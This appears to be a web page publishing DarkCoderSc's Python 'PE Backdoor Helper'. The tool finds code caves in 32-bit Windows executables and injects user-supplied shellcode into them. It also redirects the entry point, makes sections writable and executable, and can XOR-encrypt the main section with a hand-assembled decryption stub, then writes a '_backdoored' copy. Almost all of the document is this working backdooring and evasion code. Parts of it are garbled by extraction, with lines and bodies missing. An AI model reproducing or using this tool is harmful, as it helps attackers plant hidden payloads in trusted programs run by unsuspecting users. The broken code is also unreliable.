Windows Python / Code Cave by DarkCoderSc

Created the Monday 09 November 2020. Updated 5 months, 4 weeks ago.


  • -f / --file : Valid PE File location (Ex: /path/to/calc.exe).
  • -p / --payload : Shellcode Payload (Example: \"\x01\x02\x03...\x0a\").
  • -x / --encrypt : Encrypt main section (entry point section).
  • -k / --encryption-key : Define custom encryption key (1 Byte only).
  • -c / --cave-opcodes : Define code opcode list to search for.
  • -s / --cave-min-size : Minimum size of region to be considered as code cave.
  • -e / --egg : Define a custom egg name (ESP Restore Mechanism).


            import pefile
import struct
import argparse
import sys
import os

class tcolors:
	clear = "\033[0m"
	green = "\033[32m"
	red = "\033[31m"
	yellow = "\033[33m"
	blue = "\033[34m"
	gray = "\033[90m"

def success(message):
	print(f"[\033[32m✓\033[39m] {message}")

def error(message):

def debug(message):
	print(f"[\033[34m*\033[39m] {message}")	

def warning(message):
	print(f"[\033[33m!\033[39m] {message}")

def title(title):
	print("\n" + ("=" * 45))
	print(f" {title}")
	print("=" * 45)

def bytearr_to_bytestr(data):
	return ''.join(f"\\x{'{:02x}'.format(x)}" for x in data)

def bytestr_to_bytearr(data):
	return list(bytearray.fromhex(data.replace("\\x", " ")))

class CodeCave:
		Class containing information about a found code cave

	def __init__(self, name, section, offset, size, cave_type): = name
		self.section = section
		self.offset = offset	
		self.size = size	
		self.type = cave_type

def get_section_by_address(address):
	for section in pe.sections:

		section_begin_address = (image_base + section.VirtualAddress)
		section_end_address = (section_begin_address + section.SizeOfRawData)

		if (address >= section_begin_address) and (address <= section_end_address):
			return section

	return None

def get_section_name(section):
		Return the name of a PE Section and strip for extra zeroes

		A section name is always equal to zero bytes and padded with zeros.

	if not section:
		return ""

	return section.Name.decode("utf-8").strip('\0').lower()

def define_section_rwe(section):
		Update section flag to Execute | Read | Write -> 0xE0000020
	flags = 0xe0000020

	if section.Characteristics != flags:
		debug(f"Section flags updated from {hex(section.Characteristics)} to {hex(flags)} (READ / WRITE / EXECUTE)")

		section.Characteristics = flags

def code_cave_finder(section, cave_opcode):
		Find a succession of x NOP's or a succession of x NULL Bytes in a section.

		To be consired as a code cave, buffer space must be at least equal or above 50 Bytes.

		Section must be executable in order to host our payload.	

	name = get_section_name(section)

	if len(search_in_sections) > 0:
		if not name in search_in_sections:
			return False

	offset = section.VirtualAddress

	section_data = pe.get_memory_mapped_image()[offset:offset + section.SizeOfRawData]		

	cave_length = 0	

	for index, b in enumerate(section_data, start=1):			
		if (b == cave_opcode):				
			cave_length += 1	

		if ((b != cave_opcode) and (cave_length > 0)) or (index == len(section_data)):
			if cave_length >= argv.cave_min_size:					
				cave = CodeCave(name, section, (index - cave_length), cave_length, cave_opcode)

			cave_length = 0

	return True

def encrypt_section(section, xor_key):
		Encrypt whole PE Section using a basic XOR Encoder (4 Bytes Key)

	offset = section.VirtualAddress

	section_data = bytearray(pe.get_memory_mapped_image()[offset:offset + section.SizeOfRawData])

	for index, b in enumerate(section_data):				
		section_data[index] =  b ^ xor_key # b ^ (index % 256)

	pe.set_bytes_at_offset(section.PointerToRawData, bytes(section_data))	

def get_rel_distance(origine, destination):
		Retrieve the relative distance between two locations.

		location is relative to image_base
	origine += image_base
	destination += image_base

	distance = 0x0

	if origine > destination:
		distance = (0x0 - (origine - destination)) & 0xffffffff
		distance = (destination - origine)

	return distance


	Entry Point
if __name__ == "__main__":
	search_in_sections = [] # [] = All Sections
		argument_parser = argparse.ArgumentParser(description=f"PE Backdoor Helper by {}@DarkCoderSc{tcolors.clear}")

		argument_parser.add_argument('-f', '--file', type=str, dest="file", action="store", required=True, help="Valid PE File location (Ex: /path/to/calc.exe).")

		argument_parser.add_argument('-p', '--payload', type=str, dest="payload", action="store", required=False, default="", help="Shellcode Payload (Example: \"\\x01\\x02\\x03...\\x0a\").")

		argument_parser.add_argument('-x', '--encrypt', dest="encrypt_main_section", action="store_true", required=False, default=False, help="Encrypt main section (entry point section).")		

		argument_parser.add_argument('-k', '--encryption-key', type=str, dest="encryption_key", action="store", required=False, default="\\x0c", help="Define custom encryption key (1 Byte only).")		

		argument_parser.add_argument('-c', '--cave-opcodes', type=str, dest="cave_opcodes", action="store", default="\\x00\\x90", help="Define code opcode list to search for.")

		argument_parser.add_argument('-s', '--cave-min-size', type=int, dest="cave_min_size", action="store", default=50, help="Minimum size of region to be considered as code cave.")				

		argument_parser.add_argument('-e', '--egg', type=str, dest="egg", action="store", required=False, default="egg!", help="Define a custom egg name (ESP Restore Mechanism)")

			argv = argument_parser.parse_args()		
		except IOError as e:

		if not argv.encrypt_main_section and (len(argv.payload) == 0):
			raise Exception("You must either define a payload or decide to encrypt main section of target file in order to find this tool useful.")

			shellcode = bytestr_to_bytearr(argv.payload)
			cave_opcode = bytestr_to_bytearr(argv.cave_opcodes)
			encryption_key = bytestr_to_bytearr(argv.encryption_key)
			raise Exception("Malformed byte string. A byte string must be defined with the following format: \"\\x01\\x02\\x03...\\x0a\".")

		if len(encryption_key) > 1:
			raise Exception("Encryption key must be equal to 1 byte. Example: \"\\x0c\"")

		debug(f"Loading PE File: {}\"{argv.file}\"{tcolors.clear}")

		pe = pefile.PE(argv.file, fast_load=False)	
		image_base = pe.OPTIONAL_HEADER.ImageBase
		entry_point_address = pe.OPTIONAL_HEADER.AddressOfEntryPoint

		if pe.FILE_HEADER.Machine != pefile.MACHINE_TYPE["IMAGE_FILE_MACHINE_I386"]:
			raise Exception("This script is not compatible with x86-64 PE Files.")

		debug(f"Image Base: {}{hex(image_base)}{tcolors.clear}")
		debug(f"Entry Point: {}{hex(entry_point_address)}{tcolors.clear}")

		# Enumerate Code Caves in Executable Sections

		code_caves = []

		if len(cave_opcode) == 0:
			raise Exception(f"You must specify at least one code cave opcode (Ex: {}\\x00\\x90{tcolors.clear}")

		debug("Searching for code caves...")
		for section in pe.sections:
			debug(f"Scanning {}\"{get_section_name(section)}\"{tcolors.clear}, " \
			      f"VirtualOffset=[{hex(section.VirtualAddress)}], RawOffset=[{hex(section.PointerToRawData)}], " \
			      f"Size=[{hex(section.SizeOfRawData)}], Characteristics=[{hex(section.Characteristics)}]")

			for opcode in cave_opcode:
				code_cave_finder(section, opcode)

		# List found code caves
		if len(code_caves) == 0:
			warning("No code cave present in target file.")
			title("Code Cave Results")
			for index, cave in enumerate(code_caves):
				print(f"({}{index +1}{tcolors.clear}) Code cave in section=[{}{}{tcolors.clear}], "\
					  f"relative_offset=[{hex(cave.offset)}], cave_size=[{hex(cave.size)}], cave_type=[{hex(cave.type)}]")

			# Select desired code cave for payload injection
			cave = None		
			while True:
				print(f"\nEnter desired code cave index for code injection (CTRL+C to abort): ", end="")
					choice = int(input())				

					if (choice < 1) or (choice > len(code_caves)):
					cave = code_caves[choice -1]

				except KeyboardInterrupt:
					raise Exception("\nExecution aborted.")

			if not cave:
				raise Exception("Unexpected error.")

			debug("Checking if cave section has correct flags set...")


			debug("Retrieve section of entrypoint...")
			entry_section = get_section_by_address(image_base + entry_point_address)
			if not entry_section:
				raise Exception("Could not find section of entrypoint...")

			success(f"Entrypoint is located in {get_section_name(entry_section)}.")			

			new_entry_point_address = (cave.section.VirtualAddress + cave.offset)

			debug(f"Patch entrypoint address with code cave address: {hex(entry_point_address)} to {hex(new_entry_point_address)}.")

			pe.OPTIONAL_HEADER.AddressOfEntryPoint = new_entry_point_address

			# Start Encryption Mechanisms

			if argv.encrypt_main_section:
				debug("Prepare main section (entrypoint section) encryption...")				


				debug("Start encryption....")

				encrypt_section(entry_section, encryption_key[0])					

				success("Main section successfully encrypted.")

			debug("Carving code cave payload...")

			# Prologue

			debug("Writing code cave prologue: saving registers, flags, ESP recovery mechanism...")			

			# Save registers and flags
			payload = b""
			payload += b"\x60" # pushad
			payload += b"\x9C" # pushfd						

			# Place eggs to recover stack state (restore ESP to original and expected value)		
			egg = argv.egg.encode('ascii')[::-1]
			payload += ((b"\x68" + egg) * 2) # egg!egg!

			# Decryption Routine (If encryption was requested)
			if argv.encrypt_main_section:
				debug("Writing code cave decryption routine to decrypt main section...")

				payload += b"\xe8\x00\x00\x00\x00"              # call (next_instruction) and save EIP to ESP
				payload += b"\x5e"                              # pop esi
				payload += b"\x83\xee"                          # sub esi, (payload_length)
				payload += struct.pack("B", len(payload)- 3)    # -3 because we don't count two last instructions
				payload += b"\x56"                              # push esi
				payload += b"\x5f"                              # pop edi
				payload += b"\x81\xc7"                          # add edi, (size of cave)
				payload += struct.pack("<I", cave.size)         # size of cave in Little Endian
				payload += b"\x56"                              # push esi
				payload += b"\x58"                              # pop eax

				origine_offset = image_base + cave.section.VirtualAddress + cave.offset
				destination_offset = image_base + entry_section.VirtualAddress

				if origine_offset > destination_offset:
					payload += b"\x2d"                          # sub eax, ????????
					payload += struct.pack("<I", (origine_offset - destination_offset))
					payload += b"\x05"                          # add eax, ????????
					payload += struct.pack("<I", (destination_offset - origine_offset))

				payload += b"\x50"         # push eax
				payload += b"\x5b"         # pop ebx
				payload += b"\x81\xc3"     # add ebx, (main section start + end)
				payload += struct.pack("<I", entry_section.SizeOfRawData)

				payload += b"\x3b\xc6"     # cmp eax, esi
				payload += b"\x7c\x04"     # jl (xor routine)
				payload += b"\x3b\xc7"     # cmp eax, edi
				payload += b"\x7c\x03"     # jl (inc eax)
				payload += b"\x80\x30"     # xor byte [eax], (xor_key_byte)
				payload += struct.pack("B", encryption_key[0])
				payload += b"\x40"         # inc eax
				payload += b"\x3b\xc3"     # cmp eax, ebx
				payload += b"\x75\xf0"     # jne (cmp eax, esi)

			# Insert Shellcode
			if argv.payload:
				debug(f"Writing shellcode payload, size=[{hex(len(shellcode))}]...")

				payload += bytes(shellcode)

			# Epilogue (Restore ESP, registers, entrypoint)

			debug("Writing code cave epilogue: restore ESP, flags, registers and jump back to original entrypoint...")		

			# restore ESP
			payload += b"\xb8" + egg   # mov eax, "egg"
			payload += b"\x54"         # push esp
			payload += b"\x5f"         # pop edi
			payload += b"\xaf"         # scasd
			payload += b"\x75\x0c"     # jnz _pop_ebx
			payload += b"\xaf"         # scasd
			payload += b"\x75\x09"     # jnz _pop_ebx
			payload += b"\x57"         # push edi
			payload += b"\x5c"         # pop esp

			# Restore Registers
			payload += b"\x9D"         # popfd
			payload += b"\x61"         # popad		

			instruction_size = 5  # bytes (0xe9/jmp) 0x???????? (Little Endian)

			from_offset = cave.section.VirtualAddress + cave.offset + len(payload) + instruction_size

			jmp_to_offset = get_rel_distance(from_offset, entry_point_address)

			# Jump back to original entrypoint
			payload += b"\xe9"                           # jmp
			payload += struct.pack("<I", jmp_to_offset)  # ????????

			# Part of ESP restoration
			payload += b"\x5b"                           # pop ebx
			payload += b"\xeb\xee"                       # jmp _push_esp		

			# Write Final Payload to Section

			if len(payload) > cave.size:
				error("Cave size is too small to be used with your payload.")
				pe.set_bytes_at_offset((cave.section.PointerToRawData + cave.offset), payload)

				file_info = os.path.splitext(argv.file)

				output_file = f"{file_info[0]}_backdoored{file_info[1]}"

				success(f"Success! backdoored version location: \"{output_file}\".")
	except Exception as e:
		exc_type, exc_obj, exc_tb = sys.exc_info()
		error(f"{str(e)}, line=[{exc_tb.tb_lineno}]")